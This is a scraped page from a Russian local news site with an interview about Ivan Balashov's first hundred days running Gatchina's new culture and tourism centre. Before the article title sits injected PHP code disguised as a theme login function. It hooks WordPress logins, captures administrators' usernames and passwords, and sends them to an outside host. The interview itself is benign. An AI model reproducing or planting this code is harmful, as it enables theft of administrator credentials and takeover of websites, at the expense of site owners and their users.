if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } Пятнадцать лет и 100 дней Ивана Балашова — Гатчинка.рф
Home » N.B! Тема » Пятнадцать лет и 100 дней Ивана Балашова
Иван Балашов

Пятнадцать лет и 100 дней Ивана Балашова

Тот, кто был пионером, помнит сакраментальную фразу: «Гайдар в твои годы полком командовал!». Произнося её, взрослые надеялись вдохновить юное племя на активную деятельность. Но это скорее раздражало, чем вдохновляло. То время, когда кто-то чем-то командовал было от нас бесконечно далеко, и мы не могли представить, как такое могло случиться, чтобы в 16 лет, и полком…

Взрослым Гатчинского округа несравненно повезло. У них для вдохновляющего примера есть Иван Балашов. Они смело могут говорить современным недорослям: «Балашов в твои годы Домом культуры руководил!» И это истинная правда: пятнадцать лет назад девятнадцатилетнего парня назначили директором Сусанинского дома культуры. Иван Балашов — не легендарная личность из далёкого прошлого, он наш современник, с которым можно поговорить, расспросить о том, как совсем юный человек не побоялся взяться за руководство взрослым коллективом. Ваня интересно рассказывает о трудовом пути на ниве сельской культуры. И действительно вдохновляет…

Но наш разговор с Иваном Сергеевичем Балашовым был о другом жизненном периоде — о ста днях, которые прошли с момента назначения его на новую должность: директора «Центра содействия развитию культуры и туризма» Гатчинского муниципального округа. Говорят, именно столько дней нужно, чтобы понять, остаёшься ты, или: «Нет уж, увольте!»

Иван на этот вопрос ответил твёрдо и оптимистично: «Да! Мне интересно. Я хочу работать!» Но это было в конце интервью, а начали мы вот с чего:

— Вы пятнадцать лет были директором Сусанинского Дома культуры. У Вас там было всё хорошо: прекрасная команда, концертная деятельность, замечательные спектакли, взаимопонимание с руководством поселения… Почему Вы всё оставили?

— В ДК всё поставлено на рельсы, в хорошем смысле слова. Там действительно очень хорошая команда, там остался хороший руководитель Ирина Анатольевна Молчанова. И я уверен, что все те проекты, все те дела, которые мы когда-то начинали вместе, они продолжатся и дальше. А мне хочется уже более масштабных проектов, которые на уровне сельского дома культуры не осуществить. Но с командой, которая сложилась, мы продолжаем вместе работать. Я продолжаю участвовать в их мероприятиях при необходимости. И, наоборот, привлекаю их к проектам, которые осуществляются на уровне Центра. Например: во время большого фестиваля бардовской песни, который пройдёт 21 июня в Гатчине, сотрудники Сусанинского ДК будут моей административно-режиссёрской группой.

— Если Вы выросли из «штанишек» сельского ДК, то, рано или поздно, Вам станет тесным и нынешнее место работы. Как следующий шаг можно предположить должность председателя комитета. Но Мария Титова — молодая женщина, и трудно представить, что Вы скоро сможете оказаться в этом кресле.

— Ой! Нет! Это я совсем не планирую, я ещё хочу пожить. (Смеётся.) Я вижу тот ритм, тот режим, в котором работает Мария Леонидовна — это, буквально, нон-стоп — 24 часа в сутки. Я иногда смотрю на неё и думаю: Господи! Вот как это вообще человек столько успевает?! У меня сейчас таких амбиций нет.

— Тем более, что Ваше новое место работы, это недавно созданная структура и Вам предстоит налаживать её деятельность с нуля. Будет достаточно места для профессионального роста.

— Деятельность учреждения, которое создали — «Центр содействия развитию культуры и туризма» — направлена на реализацию больших, крупных, масштабных проектов, связанных с культурой и туризмом в Гатчине и в округе. Таких структур нет в Ленинградской области, мы в полном смысле — первопроходцы. Поэтому работы действительно предстоит очень много. И в организационном смысле, и в смысле деятельности, ради которой наш Центр был задуман. Когда я пришёл, чуть больше трёх месяцев назад, у нас в планах было 4 проекта, сейчас их уже 20.

Организация всех праздников всегда ложится на плечи ДК и ЦТЮ, если мы говорим о городе. Но объём работы настолько велик, культурно-массовые мероприятия в Гатчине поставлены на поток. Учреждения культуры, о которых я сказал, просто задыхаются. А ведь есть ещё и крупные проекты: День Победы, Пушкинский праздник, Новый год… Поэтому появилась необходимость создать какое-то отдельное учреждение, которое будет заниматься вот такими масштабными проектами, освободив учреждения культуры для их текущей деятельности. Ну, и плюс сейчас мы начинаем заниматься различными проектами, которые призваны увеличить туристические потоки в Гатчинский округ. Мы должны рассказать людям, что Гатчина и Гатчинский округ —это не только дворец, а ещё огромное количество удивительных мест, которые заслуживают внимания. Я помню: во времена Елены Викторовны Любушкиной была попытка ребрендинга Гатчинского района. Тогда на всех грамотах вместо дворца и Павла изображали Рождественскую усадьбу. Потом это как-то сошло на нет. Мы сейчас активно начнём работать в этом направлении: поиска своего стиля, создания бренда.

— Для того чтобы делать такую немалую работу, нужен хороший коллектив и в количественном, и в качественном смысле. Кто с Вами работает? Где располагается Ваша «контора»?

— У нас пока небольшой штат. У меня есть заместитель. У нас фотограф-художник, видеограф, режиссёр. Вскоре должен появиться второй режиссёр и менеджер по основной работе. Пока что мы базируемся в комитете по культуре на Рощинской. Мечтаем о своём отдельном здании, потому что мы уже обрастаем и техникой, и костюмами, и бумагами. Всё это нужно где-то хранить. Но пока ждём каких-то вариантов, предложений, чтобы куда-то переехать.

— Ну, а по персоналиям? Кто-то из известных в Гатчине людей есть?

— Да, очень известные, на мой взгляд, люди. Режиссёром у нас работает Олег Корух. Он очень много лет работает в Гатчине, он актёр ТЮЗа. Пришла работать Евгения Степура. Она больше известна под фамилией Витенко. Её знают как певицу, при этом у неё режиссёрское образование, школа Михаила Лейкина. Фотограф-художник Елена Ковасорова — из Сиверского. Людям, которые увлечены своей профессией, всегда интересно начинать что-то новое, когда ты стоишь у истоков, когда можно выстроить работу на свой лад, поэтому, не буду лукавить, мне не составило труда заинтересовать людей переходом к нам на работу.

— Зарплаты достойные?

— Да. Скажу Вам, что за 15 лет, которые я работаю, культура переживала разные времена в плане зарплат, финансов. И мне кажется, что последние несколько лет, ну, грех жаловаться культуре на зарплату. Всё в порядке.

А по поводу финансирования проектов? Финансирование предусмотрено, не придётся деньги зубами выгрызать?

— Да, всё финансируется, ничего не выгрызаем, но мы для того и созданы, чтобы задействовать, скажем так, ресурсы округа и города. У нас и в городе, и в округе есть огромное количество студий звукозаписи: зачем нам оплачивать какую-то питерскую студию, тратить огромные деньги, когда мы можем это сделать здесь. Кроме того, таким образом поддерживать местный бизнес, рекламировать, указывая в постах, где, на какой студии была сделана запись. Это один из примеров.

Мы пока работаем с теми проектами, которые уже были запланированы, а значит, и бюджет был предусмотрен. Конечно, приходится где-то резать сметы, потому что не укладываемся в бюджет. Где-то приходится договариваться, как-то изворачиваться. Пока справляемся. (Улыбается.)

— Новый проект, который Вы упомянули, это, я так понимаю, Гатчинский марафон авторской песни?

— Да, мы выиграли грант на областной проект: фестиваль авторской песни. Это будет очень интересный, на мой взгляд, фестиваль уличной песни. 21 июня в Гатчине будут одновременно работать несколько площадок, вечером будет гала-концерт. На участие заявились более 10 районов области. Мы сейчас усиленно работаем, чтобы достойно представить наш город, и представить округ, что у нас здесь красиво, что у нас здесь интересно, что у нас мероприятия проходят на столичном уровне.

— Новые проекты — это замечательно, тем более что нужно держать столичный размах. Но при всём моём уважении к авторской песне (это один из моих любимых жанров), думаю, что из других районов приедут только участники, а зрители не поедут. Потому что в этом нет местного колорита. Бардовский фестиваль останется бардовским, в каком бы районе его не проводили. Это если мы говорим о том, что ваш Центр создан для содействия развитию культуры и туризма. Я думаю, что нужно больше сил и средств вкладывать в то, что в округе и городе есть уникального.

— Москва, как известно, не сразу строилась. (Улыбается.) Когда меня принимали на работу, мне говорили, что есть проблемные вещи, где недостаточное финансирование, недостаточное внимание, недостаточное рекламирование. На местах есть интересные проекты, которым недостаточно ресурсов местных учреждений культуры. Мы всё это изучаем, берём на заметку.

— Возьмите на заметку Купринфест, который ежегодно в рамках Дня города проходит в Гатчине. Он стоит того, чтобы в него вложить время и деньги, и сделать одним из поводов туристического паломничества.

— Да, Куприн — это очень интересная тема, мы обязательно будем над этим работать.

— Наш округ очень большой, и очень культурный, сил-то на всё хватит? Вы не боитесь, что вас просто затюкают?

— У нас нет выбора, надо выстоять. (Улыбается.) Сейчас самое главное —собрать надёжную команду. Мы эту команду собираем. На это надо время.

— Сколько Вы уже в должности?

— Апрель, май, июнь — три месяца пока.

— Практически, те самые сто дней, когда понимаешь, остаёшься ты или уходишь… Что Вы решили?

— Да! Мне интересно. Я хочу работать! — ответил Иван Сергеевич твёрдо и оптимистично.

Беседовала Алёна РЫБАКОВА

Фотография из архива Ивана Балашова